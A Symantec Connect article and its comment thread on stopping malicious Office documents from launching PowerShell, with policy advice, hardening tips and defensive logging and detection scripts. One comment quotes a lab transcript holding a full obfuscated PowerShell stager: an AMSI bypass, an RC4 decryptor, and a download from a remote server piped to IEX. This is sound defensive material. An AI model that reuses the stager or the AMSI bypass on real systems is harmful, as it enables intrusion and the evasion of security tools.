Microsoft’s PowerShell has lately been a tool of choice for malware distributors, and the trend has only increased since the December 2016 white paper "PowerShell threats surge: 95.4 percent of analyzed scripts were malicious". Too often, end users tricked into opening a malicious attachment find this powerful tool turned against them. The ultimate payload downloaded by PowerShell is usually ransomware. Once it is downloaded and run:
***** YOUR FILES HAVE BEING ENCRYPTED *****
Now your organization’s data is lost, unless you have a healthy backup.
Application And Device Control: An Excellent Extra Line of Defense
Using Symantec Endpoint Protection’s optional Application And Device Control component, it is possible to prevent malicious Word, Excel or other Office document attachments from accessing PowerShell or cmd. Here’s a guide illustrating how to craft such a policy yourself….
Or, find the attached policy that can be implemented and tested in your environment. Please note that this “Blocking PowerShell.dat” file is provided “as is.” We strongly recommend that it be trialed first in a controlled test environment before applying the policy throughout the organization! Also note that this is one extra layer of defense: it further reduces the risk of a malware infection, but cannot guarantee eliminating all possibility of damage.
More MUST READ Articles and Documents
Hardening Your Environment Against Ransomware
https://www.symantec.com/connect/articles/hardening-your-environment-against-ransomware
Support Perspective: W97M.Downloader Battle Plan
https://www.symantec.com/connect/articles/support-perspective-w97mdownloader-battle-plan
REPORT: Organizations must respond to increasing threat of ransomware
https://www.symantec.com/connect/blogs/report-organizations-must-respond-increasing-threat-ransomware
Ransomware removal and protection with Symantec Endpoint Protection
https://support.symantec.com/en_US/article.HOWTO124710.html
Best Practices for Deploying Symantec Endpoint Protection's Application and Device Control Policies
http://www.symantec.com/docs/TECH145973
Many thanks to mick2009 for reviewing this article!
You could do this over ADC, but if the clients are connected to an AD, you can also set up a GPO which records the PS commands in high detail.
GPO: Computer Configuration => Administrative Templates => Windows Components => Windows PowerShell
The log location is a network share within your environment.
Example from a proving-ground environment of a mimikatz recording:
********************** Windows PowerShell transcript start Start time: 20170725143617 Username: WIN10\ADMIN RunAs User: WIN10\ADMIN Machine: WIN10 (Microsoft Windows NT 10.0.14393.0) Host Application: powershell -noP -sta -w 1 -enc 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 Process ID: 5772 PSVersion: 5.1.14393.0 PSEdition: Desktop PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.0 BuildVersion: 10.0.14393.0 CLRVersion: 4.0.30319.42000 WSManStackVersion: 3.0 PSRemotingProtocolVersion: 2.3 SerializationVersion: 1.1.0.1 ********************** ********************** Command start time: 20170725143617 ********************** PS>[REf].ASsEMbly.GeTTypE('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GetFieLd('amsiInitFailed','NonPublic,Static').SetVALue($nULl,$TRue)};[SYStem.NeT.SErvIcEPOinTMAnager]::ExpecT100ConTinUE=0;$wC=NEW-ObJECT SYstEm.NeT.WebClIeNt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$Wc.HEAdERs.AdD('User-Agent',$u);$wC.ProxY=[SysTeM.NEt.WebREqUEsT]::DeFaULtWEBPrOXy;$wc.PROXY.CrEdeNtIalS = [SYstem.NET.CRedENtialCaChe]::DEfAuLTNEtWorkCreDENtIaLS;$K=[SyStem.TeXT.ENCOding]::ASCII.GETByTEs('5f4dcc3b5aa765d61d8327deb882cf99');$R={$D,$K=$ArGS;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.COUnt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bXoR$S[($S[$I]+$S[$H])%256]}};$WC.HeAdERS.ADd("Cookie","session=Eeq7QKo7/EX7ouV1KXfEbASEGNs=");$ser='http://192.168.115.5:8080';$t='/login/process.php';$dAtA=$WC.DOwnLoadDAta($SEr+$T);$iv=$Data[0..3];$DAtA=$DatA[4..$data.LeNgTH];-jOIN[ChaR[]](& $R $DATA ($IV+$K))|IEX ********************** Command start time: 20170725143617 ********************** PS>TerminatingError(): "Specified method is not supported." Specified method is not supported. 
[REf].ASsEMbly.GeTTypE('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GetFieLd('amsiInitFailed','NonPublic,Static ').SetVALue($nULl,$TRue)};[SYStem.NeT.SErvIcEPOinTMAnager]::ExpecT100ConTinUE=0;$wC=NEW-ObJECT SYstEm.NeT.WebClIeNt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$Wc.HEAdERs.AdD('User-Agent',$u);$wC.ProxY=[SysTeM.NEt.WebREqUEsT]::DeFaULtWEBPrOXy;$wc.PROXY.CrEdeNtIalS = [SYs tem.NET.CRedENtialCaChe]::DEfAuLTNEtWorkCreDENtIaLS;$K=[SyStem.TeXT.ENCOding]::ASCII.GETByTEs('5f4dcc3b5aa765d61d8327de b882cf99');$R={$D,$K=$ArGS;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.COUnt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=( $I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bXoR$S[($S[$I]+$S[$H])%256]}};$WC.HeAdERS.ADd("Cookie","ses sion=Eeq7QKo7/EX7ouV1KXfEbASEGNs=");$ser='http://192.168.115.5:8080';$t='/login/process.php';$dAtA=$WC.DOwnLoadDAta($SE r+$T);$iv=$Data[0..3];$DAtA=$DatA[4..$data.LeNgTH];-jOIN[ChaR[]](& $R $DATA ($IV+$K))|IEX : Specified method is not supported. + CategoryInfo : NotImplemented: (:) [], PSNotSupportedException + FullyQualifiedErrorId : NotSupported
********************** Command start time: 20170725143617 ********************** PS>$global:? False ********************** Windows PowerShell transcript end End time: 20170725143617 **********************
I would also recommend thinking about simple things like PS hardening via environment variables. You could use a poorly documented setting: Constrained Language Mode
Example:
HKLM\System\CurrentControlSet\Control\SESSIONMANAGER\Environment\ String: __PSLockdownPolicy Value: 4
Benefit: base64 attacks are no longer easily possible
Problem: Environment Variables can be deleted!
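An added example, not part of the article or of the comment above: it writes the registry values that the transcription and script block logging GPO controls (so the same result is reached on a non-domain host), then scans the transcript share for the behaviours visible in the logged session (AMSI tampering, an encoded command line, download-and-execute). The share path \\FILESERVER\PSTranscripts$ is a placeholder, and the script assumes it runs elevated.

```powershell
# Added example, not part of the article or the comment above. Assumes the
# transcript share \\FILESERVER\PSTranscripts$ (placeholder) and runs elevated.
$share = '\\FILESERVER\PSTranscripts$'

# The registry values the GPO under Windows Components => Windows PowerShell
# writes; setting them directly gives the same result on a non-domain host.
$policy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
New-Item -Path "$policy\Transcription", "$policy\ScriptBlockLogging" -Force | Out-Null
Set-ItemProperty "$policy\Transcription" -Name EnableTranscripting -Value 1 -Type DWord
Set-ItemProperty "$policy\Transcription" -Name EnableInvocationHeader -Value 1 -Type DWord
Set-ItemProperty "$policy\Transcription" -Name OutputDirectory -Value $share -Type String
Set-ItemProperty "$policy\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1 -Type DWord

# Behaviours visible in the transcript above: AMSI tampering, an encoded
# command line, download-and-execute. Matching is case-insensitive because
# such stagers randomise the casing of every identifier.
$indicators = [ordered]@{
    AmsiTamper       = 'amsiInitFailed|AmsiUtils'
    EncodedCommand   = '(^|\s)-(e|ec|enc|encodedcommand)\s'
    DownloadAndRun   = 'DownloadData|DownloadString'
    InvokeExpression = '\|\s*IEX\b|Invoke-Expression'
}

function Find-SuspiciousTranscript {
    param([string]$Path = $share, [int]$Days = 1)
    Get-ChildItem -Path $Path -Recurse -Filter 'PowerShell_transcript*.txt' |
        Where-Object { $_.LastWriteTime -gt (Get-Date).AddDays(-$Days) } |
        ForEach-Object {
            $text = Get-Content -Path $_.FullName -Raw
            $hits = foreach ($i in $indicators.GetEnumerator()) {
                if ($text -imatch $i.Value) { $i.Key }
            }
            if ($hits) {
                # Header fields the transcript writes: who ran it, on which machine
                $user    = [regex]::Match($text, 'Username:\s*(\S+)').Groups[1].Value
                $machine = [regex]::Match($text, 'Machine:\s*(\S+)').Groups[1].Value
                [pscustomobject]@{
                    File       = $_.FullName
                    Machine    = $machine
                    User       = $user
                    Indicators = ($hits -join ', ')
                }
            }
        }
}

Find-SuspiciousTranscript | Format-Table -AutoSize
```

The share should be writable but not readable by ordinary users, otherwise the transcripts themselves leak what other users typed, and a clean host of the scanning script will show up with hits of its own because its transcript contains the indicator strings.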
Sorry for bumping this old thread.
If we want to log every PowerShell command by leveraging SEP ADC, do we just put the running process as any? (*.exe?)
You don't need the entire path in AC. You can just use winword.exe, powerpnt.exe and excel.exe without a prefix.
Hi all,
Thanks for sharing this. A more effective way to cover all installations and future updates of MS Office is to use the registry link to the different components.
As an example: #HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\powerpnt.exe\Path#*\*
This would enable protection for MS PowerPoint for every installed version and bring the ADC rule into a static condition, without the need to reconfigure it every time.
Please also look at this article: https://www.symantec.com/connect/blogs/defeat-powerware-using-sep-application-control-policies
Hope this helps.
T.
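An added example, not the comment author's code: it resolves the Office binaries through the App Paths keys the comment refers to, checks that the directory the Path value points at really contains the executable, and emits the ADC registry-link pattern in the same form as the comment's PowerPoint example for each of winword.exe, excel.exe and powerpnt.exe.

```powershell
# Added example, not the comment author's code. Resolves the Office binaries
# through the App Paths keys the comment refers to and emits the matching
# ADC registry-link pattern, so the rule can be checked before deployment.
$appPaths  = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths'
$officeExe = 'winword.exe', 'excel.exe', 'powerpnt.exe'

function Get-OfficeAdcPattern {
    param([string[]]$Exe = $officeExe)
    foreach ($name in $Exe) {
        $item = Get-ItemProperty -Path (Join-Path $appPaths $name) -ErrorAction SilentlyContinue
        # No App Paths key or no Path value: the registry-link rule would match
        # nothing on this host, so an explicit install path is needed instead.
        if (-not $item -or -not $item.Path) {
            [pscustomobject]@{ Exe = $name; Registered = $false; Directory = $null; BinaryFound = $false; AdcPattern = $null }
            continue
        }
        $dir = $item.Path.TrimEnd('\')
        [pscustomobject]@{
            Exe         = $name
            Registered  = $true
            Directory   = $dir
            # Path is the install directory; the binary must really be there
            BinaryFound = Test-Path -Path (Join-Path $dir $name)
            # Same form as the comment's example, with the executable name substituted
            AdcPattern  = "#HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\$name\Path#*\*"
        }
    }
}

Get-OfficeAdcPattern | Format-Table -AutoSize
```

A per-user Office installation registers under HKCU rather than HKLM, so a row with Registered = False on a host that does have Office is the cue to check that hive before relying on the HKLM-based rule.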
Hi Mithun, thanks for your comment. I believe that Office365 (web Word version) will not run a PowerShell script or a Macro. Only the local installation will be able to access PowerShell, and then ADC will trigger the action. We have to consider here any installation path variations:
Office 2013
  32-bit
    Windows 32-bit: C:\Program Files\Microsoft Office\Office15\
    Windows 64-bit: C:\Program Files (x86)\Microsoft Office\Office15\
  64-bit
    Windows 64-bit: C:\Program Files\Microsoft Office\Office15\
  Click-To-Run
    Windows 32-bit: C:\Program Files\Microsoft Office 15\ClientX86\Root\Office15\
    Windows 64-bit: C:\Program Files (x86)\Microsoft Office 15\ClientX64\Root\Office15\
Office 2016
  32-bit
    Windows 32-bit: C:\Program Files\Microsoft Office\root\Office16\
    Windows 64-bit: C:\Program Files (x86)\Microsoft Office\root\Office16\
  64-bit
    Windows 64-bit: C:\Program Files\Microsoft Office\root\Office16\
  Click-To-Run
    Windows 32-bit: C:\Program Files\Microsoft Office 16\ClientX86\Root\Office16\
    Windows 64-bit: C:\Program Files (x86)\Microsoft Office 16\ClientX64\Root\Office16\
Hope that Helps!
Wonderful article! This is going to assist a lot of security administrators in controlling the latest threats arising from Office.
However, I am wondering if this rule would work with Office 365.
Lucas, is there a way we could perform similar control on Office365?
My suggestion would be to set this rule to 'Test (log only)' as the default.
Absolutely TORB, I have worked with a customer which added cmd and other processes able to run scripts. As said in the article, exhaustive testing is required before enabling in production. Thanks.